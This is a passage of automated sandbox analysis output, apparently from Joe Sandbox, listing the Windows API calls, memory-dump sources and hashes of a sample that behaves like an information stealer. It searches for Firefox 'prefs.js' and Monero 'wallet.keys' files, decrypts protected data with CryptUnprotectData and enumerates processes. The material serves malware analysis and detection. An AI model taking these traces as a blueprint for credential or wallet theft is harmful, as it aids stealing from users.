                                • Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12
                                • Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C015B8,00C00D96), ref: 00BEF71E
                              • StrCmpCA.SHLWAPI(?,00C015BC), ref: 00BEF76F
                              • StrCmpCA.SHLWAPI(?,00C015C0), ref: 00BEF785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00BEFAB1
                              • FindClose.KERNEL32(000000FF), ref: 00BEFAC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                               • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: prefs.js
                              • API String ID: 3334442632-3783873740
                              • Opcode ID: 1168fad50b37dfc1cc31687630045660eb787204c9ef7e36ce16d992e6602ee3
                              • Instruction ID: b5dc9554c3a8834fa14734cf4c14902bd55186f0378dce4b475ac0e0619e8032
                              • Opcode Fuzzy Hash: 1168fad50b37dfc1cc31687630045660eb787204c9ef7e36ce16d992e6602ee3
                              • Instruction Fuzzy Hash: 0DB12FB19001099BDB28FF64DC95AFD73B9AB54300F4085E8A50EA7195EF706B4DCB92
                              APIs
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C0510C,?,?,?,00C051B4,?,?,00000000,?,00000000), ref: 00BE1923
                              • StrCmpCA.SHLWAPI(?,00C0525C), ref: 00BE1973
                              • StrCmpCA.SHLWAPI(?,00C05304), ref: 00BE1989
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BE1D40
                              • DeleteFileA.KERNEL32(00000000), ref: 00BE1DCA
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00BE1E20
                              • FindClose.KERNEL32(000000FF), ref: 00BE1E32
                                • Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
                                • Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982
                                • Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
                                • Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
                                • Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12
                                • Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                               • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 1415058207-1173974218
                              • Opcode ID: d626084926d2de5754ad71a80cdb6acc695e4269d9fdc37e4114ec04e950aa0c
                              • Instruction ID: c2bbbd95400a62c3b16272e3a259572d0ec4879f891ae09dd763d6010cc66848
                              • Opcode Fuzzy Hash: d626084926d2de5754ad71a80cdb6acc695e4269d9fdc37e4114ec04e950aa0c
                              • Instruction Fuzzy Hash: DB12DCB191011C9BDB19EB64CC96AFE73B8AF54340F5085E9A60A63091EF706F8DCF91
                              APIs
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                                • Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
                                • Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
                                • Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12
                                • Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00C00C2E), ref: 00BEDE5E
                              • StrCmpCA.SHLWAPI(?,00C014C8), ref: 00BEDEAE
                              • StrCmpCA.SHLWAPI(?,00C014CC), ref: 00BEDEC4
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00BEE3E0
                              • FindClose.KERNEL32(000000FF), ref: 00BEE3F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                               • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                              • String ID: \*.*
                              • API String ID: 2325840235-1173974218
                              • Opcode ID: f10df2a62862f3bcab698f52d4177928ed408a6a9da64fbbf3c0d492f8a4e0ee
                              • Instruction ID: dee21f00c2a38d545e9e53c52488166d48613556bdc8f9155e41d69be9d3b523
                              • Opcode Fuzzy Hash: f10df2a62862f3bcab698f52d4177928ed408a6a9da64fbbf3c0d492f8a4e0ee
                              • Instruction Fuzzy Hash: 75F18EB181411D9ADB29EB64CC95EFEB3B8AF14340F5041E9A61E63091EF706B4ECF51
                              APIs
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                                • Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
                                • Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982
                                • Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
                                • Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
                                • Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12
                                • Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C014B0,00C00C2A), ref: 00BEDAEB
                              • StrCmpCA.SHLWAPI(?,00C014B4), ref: 00BEDB33
                              • StrCmpCA.SHLWAPI(?,00C014B8), ref: 00BEDB49
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00BEDDCC
                              • FindClose.KERNEL32(000000FF), ref: 00BEDDDE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                               • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: a3dc162e4d9502b2bf825ef658dc011226e82031d22e7e83122b799ae2f5ec64
                              • Instruction ID: 293fb31aed8362523b185f9a7f12ae999fb4efb35bece5f59496f1de9ae2f1f2
                              • Opcode Fuzzy Hash: a3dc162e4d9502b2bf825ef658dc011226e82031d22e7e83122b799ae2f5ec64
                              • Instruction Fuzzy Hash: FD9158B29001089BCB18FB75DC56DFD73BDAB84340F4085A8B90A97191EF74AB0DCB92
                              APIs
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                              • GetKeyboardLayoutList.USER32(00000000,00000000,00C005AF), ref: 00BF7BE1
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00BF7BF9
                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 00BF7C0D
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00BF7C62
                              • LocalFree.KERNEL32(00000000), ref: 00BF7D22
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                               • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              • Opcode ID: 297aaaee700b41391b206842952f2f08235e3348e2dc04da71af531786a11c03
                              • Instruction ID: 5edd0bcf4c2ba24a3b439fa6b2ff6cde1557bcfcf3422b6156e2fdee749e051b
                              • Opcode Fuzzy Hash: 297aaaee700b41391b206842952f2f08235e3348e2dc04da71af531786a11c03
                              • Instruction Fuzzy Hash: DF410AB194011CABDB28DB54DC99BFDB3B4EB44700F2041D9E60967191DB742F89CFA1
                              APIs
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                                • Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
                                • Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982
                                • Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
                                • Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
                                • Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12
                                • Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00C00D73), ref: 00BEE4A2
                              • StrCmpCA.SHLWAPI(?,00C014F8), ref: 00BEE4F2
                              • StrCmpCA.SHLWAPI(?,00C014FC), ref: 00BEE508
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00BEEBDF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                               • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 433455689-1173974218
                              • Opcode ID: 781dc9e4b5ae1d17775064d2dec5dc06213594188be40d75e7a8ffc3651ae5e3
                              • Instruction ID: e5282ca2a26bb06248ff7717e751b3e43e4e8919800bb839c40c4a24b1370731
                              • Opcode Fuzzy Hash: 781dc9e4b5ae1d17775064d2dec5dc06213594188be40d75e7a8ffc3651ae5e3
                              • Instruction Fuzzy Hash: 5312FBB191011C9ADB18FB64DC96EFD73B8AB54340F4085E9A60EA7091EF706F4DCB92
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00BEC871
                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00BEC87C
                              • lstrcat.KERNEL32(?,00C00B46), ref: 00BEC943
                              • lstrcat.KERNEL32(?,00C00B47), ref: 00BEC957
                              • lstrcat.KERNEL32(?,00C00B4E), ref: 00BEC978
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                               • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              • Opcode ID: 6c5ff3aba035736508cd16bcddf761cdc43d929a6e3651a4899024fef27b5a96
                              • Instruction ID: baa4d79ae7774e9e6c87f0fde5026cc49c6eeca57f3fda93ad0b3a099116781a
                              • Opcode Fuzzy Hash: 6c5ff3aba035736508cd16bcddf761cdc43d929a6e3651a4899024fef27b5a96
                              • Instruction Fuzzy Hash: 9B4160B990421ADFCB20DFA4DD89BFEBBB8BB44304F1441B8E509A7281D7705A85CF91
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                               • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: Zqw$1|?n$_e'$#~$y]?
                              • API String ID: 0-507574501
                              • Opcode ID: 6e38fd7e27e7c4597ba687700ee4eb7c805054c4e71b3bc903075ffa6d747294
                              • Instruction ID: 648eed16c5c2335b620cf7d461bd670672ec819efe0a23cb2ebb8d608b797d06
                              • Opcode Fuzzy Hash: 6e38fd7e27e7c4597ba687700ee4eb7c805054c4e71b3bc903075ffa6d747294
                              • Instruction Fuzzy Hash: B09219F390C2009FE304AE29EC8567AB7E9EF94720F16893DEAC4D7744EA7558018797
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00BE724D
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00BE7254
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00BE7281
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00BE72A4
                              • LocalFree.KERNEL32(?), ref: 00BE72AE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                               • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              • Opcode ID: e92c36e31904e8b7d8bccb605ad26f9ac84542916c9df9d24548274aebf1d356
                              • Instruction ID: 23adcd354e353b29a62acc4e137bc10e76f783875a7e839e2274335370561ef2
                              • Opcode Fuzzy Hash: e92c36e31904e8b7d8bccb605ad26f9ac84542916c9df9d24548274aebf1d356
                              • Instruction Fuzzy Hash: 8F0100B5A40208BFDB24DBD5DD4AF9D77B8EB44700F144155FB05BA2C0DBB0AA058B65
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00BF961E
                              • Process32First.KERNEL32(00C00ACA,00000128), ref: 00BF9632
                              • Process32Next.KERNEL32(00C00ACA,00000128), ref: 00BF9647
                              • StrCmpCA.SHLWAPI(?,00000000), ref: 00BF965C
                              • CloseHandle.KERNEL32(00C00ACA), ref: 00BF967A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                               • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              • API String ID: 420147892-0
                              • Opcode ID: 6858b816f69b9d8ab0552f5ee45eef92fa0c1c7b6f73b7c7d49702635cfaf008
                              • Instruction ID: fa70b9869641818f0e0350bde286080e6ae36d47a916c1fe52181881b0f655ea
                              • Opcode Fuzzy Hash: 6858b816f69b9d8ab0552f5ee45eef92fa0c1c7b6f73b7c7d49702635cfaf008
                              • Instruction Fuzzy Hash: 0201E975A00208AFCB24DFA5C988BEDB7F8EB48300F144199AA05E7240DB749A49CF51
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
